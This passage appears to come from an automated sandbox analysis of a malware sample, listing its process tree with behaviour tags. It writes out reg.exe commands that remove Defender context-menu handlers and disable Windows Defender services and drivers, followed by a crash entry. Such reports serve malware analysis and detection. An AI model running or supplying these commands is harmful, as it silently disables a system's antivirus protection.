  PID:2852
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2032
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1624
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1996
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1352
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies Security services
    - System Location Discovery: System Language Discovery
    PID:2832
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2128
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1720
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1384
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies Security services
    - System Location Discovery: System Language Discovery
    PID:3024
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2980
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies Security services
    - System Location Discovery: System Language Discovery
    PID:2460
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1832
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies Security services
    - System Location Discovery: System Language Discovery
    PID:1644
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:1556
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies security service
    - System Location Discovery: System Language Discovery
    PID:1232
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3068 -s 772
  2⤵
  - Program crash
  PID:2028